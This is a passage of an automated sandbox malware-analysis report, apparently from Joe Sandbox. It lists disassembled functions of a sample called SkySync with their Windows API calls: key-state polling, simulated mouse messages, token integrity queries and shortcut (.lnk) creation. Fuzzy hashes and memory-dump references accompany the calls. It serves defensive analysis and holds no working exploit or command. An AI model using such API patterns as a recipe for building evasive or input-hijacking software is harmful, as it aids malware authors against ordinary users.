GetCursorPos.USER32(?), ref: 00A92727
ScreenToClient.USER32(00B577B0,?), ref: 00A92744
GetAsyncKeyState.USER32(00000001), ref: 00A92769
GetAsyncKeyState.USER32(00000002), ref: 00A92777

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: c08b1da9e895ffaebaca85b2d4d8266f7f7ee4cb344dcc3dd295e531d5488eca
Instruction ID: f039b832c70fa28ff87cc7b4590e3824500b15827b8d1b0f8c240e2779b97d1c
Opcode Fuzzy Hash: c08b1da9e895ffaebaca85b2d4d8266f7f7ee4cb344dcc3dd295e531d5488eca
Instruction Fuzzy Hash: 42412D75604119FFDF159FA8D944FE9BBB4BB05334F20835AF828A6290CB30AD90DB91

Function 00A952B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A952E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9534A
TranslateMessage.USER32(?), ref: 00A95356
DispatchMessageW.USER32(?), ref: 00A95360

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 0950b6d256ae7c17ca6de136ff5b9604f087bf6d31afe18a9a7be13914068567
Instruction ID: d9c13c3235a7eb4e68373e9ad33e3508fd86a99639e9bcd7c1cc4f3bd11d42d5
Opcode Fuzzy Hash: 0950b6d256ae7c17ca6de136ff5b9604f087bf6d31afe18a9a7be13914068567
Instruction Fuzzy Hash: 8331F430F487059AEF328B74EC46FAA77F8AB11344F2400ADE4129B1D1DFB19885D751

Function 00AE95D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00AE95E8
PostMessageW.USER32(?,00000201,00000001), ref: 00AE9692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AE969A
PostMessageW.USER32(?,00000202,00000000), ref: 00AE96A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AE96B0

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 6fbfa83724a154e4d88c2966afba9a9082656ff4e09b7ce6858171c5679eb074
Instruction ID: ec3a64d0dd0b7a1ed9b94d6f9041907681b5988b77688bec8817869691fd15f8
Opcode Fuzzy Hash: 6fbfa83724a154e4d88c2966afba9a9082656ff4e09b7ce6858171c5679eb074
Instruction Fuzzy Hash: 2B31DD71900359EFDF24CF69D94CA9E3BB5FB44315F10422AF925AB2D1C7B09924DB90

Function 00B1B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

GetWindowLongW.USER32(?,000000F0), ref: 00B1B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B1B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B1B841
GetSystemMetrics.USER32(00000004), ref: 00B1B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B0155C,00000000), ref: 00B1B888

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 3e095fb80bcf1fc3baac67e06da77cb97b0d6e7506a5f2eafbb2071f65218f03
Instruction ID: 3f1f8ff66175044c6f226c5ac73fbb769c2674d63ec7843c0e6e1dd023ad6758
Opcode Fuzzy Hash: 3e095fb80bcf1fc3baac67e06da77cb97b0d6e7506a5f2eafbb2071f65218f03
Instruction Fuzzy Hash: CC219431A24215AFCB249F399C48FA93BE8FB45721F504778F925D31E0DB308851CB80

Function 00AB2EB8 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,00000000,00000000,?,?,00AB2E95,00ACB7EA,00B4CB50), ref: 00AB2ECB
DecodePointer.KERNEL32(?,?,00AB2E95,00ACB7EA,00B4CB50), ref: 00AB2ED6
EncodePointer.KERNEL32(00000000,?,?,00AB2E95,00ACB7EA,00B4CB50), ref: 00AB2F3D
EncodePointer.KERNEL32(00ACB7EA,?,?,00AB2E95,00ACB7EA,00B4CB50), ref: 00AB2F4B
EncodePointer.KERNEL32(00000004,?,?,00AB2E95,00ACB7EA,00B4CB50), ref: 00AB2F57

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Pointer$Encode$Decode
String ID:
API String ID: 1898114064-0
Opcode ID: b9237601f3d2d824e6299e413359159f462e008d21a4f60c56d63204268fb3d8
Instruction ID: b8488ac30af6bf5934b5a3b61457643c6ec85776e7a8e24b791e8a4f8a5c60c0
Opcode Fuzzy Hash: b9237601f3d2d824e6299e413359159f462e008d21a4f60c56d63204268fb3d8
Instruction Fuzzy Hash: BE116D72614315AF9B25EB39EC84AAA7BBDEB09350710456BF805D7212EF35EC10CB94

Function 00B06138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B06159
GetForegroundWindow.USER32 ref: 00B06170
GetDC.USER32(00000000), ref: 00B061AC
GetPixel.GDI32(00000000,?,00000003), ref: 00B061B8
ReleaseDC.USER32(00000000,00000003), ref: 00B061F3

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 295c8edd73e7c7d641b883e3ce659a43fa13dfbe02b871c4538c3949aeb70b39
Instruction ID: 395922a0f119dc0c59cbec317e1cb910ef433dd01e2e80e5273489f233009de6
Opcode Fuzzy Hash: 295c8edd73e7c7d641b883e3ce659a43fa13dfbe02b871c4538c3949aeb70b39
Instruction Fuzzy Hash: 6821A175A00204AFD714EF64DD85AAABBF9EF88311F048469F94A97262CA30AC01CB90

Function 00A916CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A91729
SelectObject.GDI32(?,00000000), ref: 00A91738
BeginPath.GDI32(?), ref: 00A9174F
SelectObject.GDI32(?,00000000), ref: 00A91778

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 5dfef84dc9a4e8ab0607cabd907420a29925ed5f2197483139f0836107c6c5c6
Instruction ID: 1aa2c5cc19b673c0c4545afca655881bb667c4fbfa0f3ee4fe8d628340796852
Opcode Fuzzy Hash: 5dfef84dc9a4e8ab0607cabd907420a29925ed5f2197483139f0836107c6c5c6
Instruction Fuzzy Hash: D0219030A1430AEBDF119F66ED48B697BE8E710312F144296F815972A0DFB19892CF90

Function 00AE8E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AE8E3C
GetLastError.KERNEL32(?,00AE8900,?,?,?), ref: 00AE8E46
GetProcessHeap.KERNEL32(00000008,?,?,00AE8900,?,?,?), ref: 00AE8E55
HeapAlloc.KERNEL32(00000000,?,00AE8900,?,?,?), ref: 00AE8E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AE8E73

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 4cd256151db43bf2fb81d4ff17bf017b7b3c2be4fd3a7dbeff47e6374cab0759
Instruction ID: 72c8c1b8c1b0a48b390de2b1ff66fd9cfd641cce8126d252f0ca0e1936f1a029
Opcode Fuzzy Hash: 4cd256151db43bf2fb81d4ff17bf017b7b3c2be4fd3a7dbeff47e6374cab0759
Instruction Fuzzy Hash: 860169B1610244BFDB215FA6DC88D6B7BADEF8A355B140529F949D3220DF36DC11CB60

Function 00AF57FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AF581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AF5829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AF5831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AF583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AF5877

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 626a0e38c7444a449641c9dfe59b03582a094f7e178128060b07dc32172c9019
Instruction ID: de57bdeb21c1f2363b2bae45dcfd04a4ae443066aed393176a73595616f30690
Opcode Fuzzy Hash: 626a0e38c7444a449641c9dfe59b03582a094f7e178128060b07dc32172c9019
Instruction Fuzzy Hash: F3013531C11A1D9BDF10AFF9E849AEDBBB8BB08791F004156EA02B2141DB349560DBE1

Function 00AE7D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AE7C62,80070057,?,?,?,00AE8073), ref: 00AE7D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AE7C62,80070057,?,?), ref: 00AE7D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AE7C62,80070057,?,?), ref: 00AE7D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AE7C62,80070057,?), ref: 00AE7D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AE7C62,80070057,?,?), ref: 00AE7D8A

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: af3a4337ecf95121e9ae7d755a1ce338220dae8437ba9d47e878b09fe54598f4
Instruction ID: 6ac982c8771686b9ae760ab80f9a333eb19f87378f8aae29b2ffe308ee9ad85d
Opcode Fuzzy Hash: af3a4337ecf95121e9ae7d755a1ce338220dae8437ba9d47e878b09fe54598f4
Instruction Fuzzy Hash: 20017C72615215ABDB215F59DC84BAE7BADEF44762F144024F908D7211EB71ED01CBE0

Function 00AE8CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AE8CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AE8CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AE8CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AE8CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AE8D14

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d874eff4adb78d0b6dcf072bed9ea7f80c29c6d9bff0e57aa5a881209fde435b
Instruction ID: f8674d15bc5f7c5d1abe7e18f18e8f4839aadaca515b7850f35bd1e8f29baa15
Opcode Fuzzy Hash: d874eff4adb78d0b6dcf072bed9ea7f80c29c6d9bff0e57aa5a881209fde435b
Instruction Fuzzy Hash: 81F0AF30210208AFEB201FA59CC9E673BACEF49755B104025F908C31A0CF649C42DB60

Function 00AE8D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AE8D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AE8D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AE8D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AE8D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AE8D75

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d69b435b6c809a1ab409e67291d7138fca6c1b939fba1b4b1249b175177ffcfa
Instruction ID: 0f5ff9ad4cdca10bbf548ec8493b7fdfbc1e4ac36f7e6fff7dd8fca55680391e
Opcode Fuzzy Hash: d69b435b6c809a1ab409e67291d7138fca6c1b939fba1b4b1249b175177ffcfa
Instruction Fuzzy Hash: 09F0AF30210244AFEB211FA5ECC8F673BACEF49755F040115F948C31A0CF659D42DB60

Function 00AECD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00AECD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 00AECDA7
MessageBeep.USER32(00000000), ref: 00AECDBF
KillTimer.USER32(?,0000040A), ref: 00AECDDB
EndDialog.USER32(?,00000001), ref: 00AECDF5

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 0d5865336232ba7f3f580983d3cd8f9759983242a9dc4cca47e1f7c2346d21ce
Instruction ID: b0d23605600ccd7a9a60af6b0e587c80bf4808a6205c296592ba7d31f8ad2e05
Opcode Fuzzy Hash: 0d5865336232ba7f3f580983d3cd8f9759983242a9dc4cca47e1f7c2346d21ce
Instruction Fuzzy Hash: ED01F930510744ABEB316B21DD8EFA67B78FF00711F000669F582A20E2DFF5A95A8B80

Function 00A9178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00A9179B
StrokeAndFillPath.GDI32(?,?,00ACBBC9,00000000,?), ref: 00A917B7
SelectObject.GDI32(?,00000000), ref: 00A917CA
DeleteObject.GDI32 ref: 00A917DD
StrokePath.GDI32(?), ref: 00A917F8

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 33428276056f96339bcc9f2b99e13e593a85572452cbeec4b6c81dcd9d3166d3
Instruction ID: 251d1594e0c166fe2476962621e925c9e8b4b0eefd7681606c01d9948fd44605
Opcode Fuzzy Hash: 33428276056f96339bcc9f2b99e13e593a85572452cbeec4b6c81dcd9d3166d3
Instruction Fuzzy Hash: 8EF0C93025830AABEB21AF66EC4C7593BA4A710326F148294F42A562F1CF314997DF50

Function 00AFC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00AFCA75
CoCreateInstance.OLE32(00B23D3C,00000000,00000001,00B23BAC,?), ref: 00AFCA8D
CoUninitialize.OLE32 ref: 00AFCCFA

Strings

.lnk, xrefs: 00AFCA09, 00AFCA31, 00AFCA3B

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 2b7a809a21a9b4df48de44798fdca6dd7c488fca970f8ac39197b6e834262a2e
Instruction ID: 21a7eb614e779c625dad3f5882dbe78ba818460f9d87749129b41e9897199814
Opcode Fuzzy Hash: 2b7a809a21a9b4df48de44798fdca6dd7c488fca970f8ac39197b6e834262a2e
Instruction Fuzzy Hash: 4DA14071204205AFD700EF64C981EAFB7ECEF99758F00491CF155971A2EB70EA0ACB92

Function 00AFBF7E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA2A58,?,00008000), ref: 00AB02A4

CoInitialize.OLE32(00000000), ref: 00AFBFFE
CoCreateInstance.OLE32(00B23D3C,00000000,00000001,00B23BAC,?), ref: 00AFC017
CoUninitialize.OLE32 ref: 00AFC034

Strings

.lnk, xrefs: 00AFBFE0, 00AFBFEE

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize
String ID: .lnk
API String ID: 3769357847-24824748
Opcode ID: 7774d10f991cd8ca73b5df53615258205e8d4272fd3733764b6bb47495f62c66
Instruction ID: e668b99b070eaee6ff5664499de6d3753a7dad7783f0edf302253383c65815a0
Opcode Fuzzy Hash: 7774d10f991cd8ca73b5df53615258205e8d4272fd3733764b6bb47495f62c66
Instruction Fuzzy Hash: 6DA18C756043099FCB00EF55C984D6AB7E5FF89324F048988F9999B3A2CB31ED46CB91

Function 00AF323D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AF335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AF3410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AF343E

Strings

0, xrefs: 00AF331A

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ItemMenu$Info$Default
String ID: 0
API String ID: 1306138088-4108050209
Opcode ID: 6a03b236a89cfbb953baf3968018ae201a19d2e9a7b25ec6898a1ddc79006c59
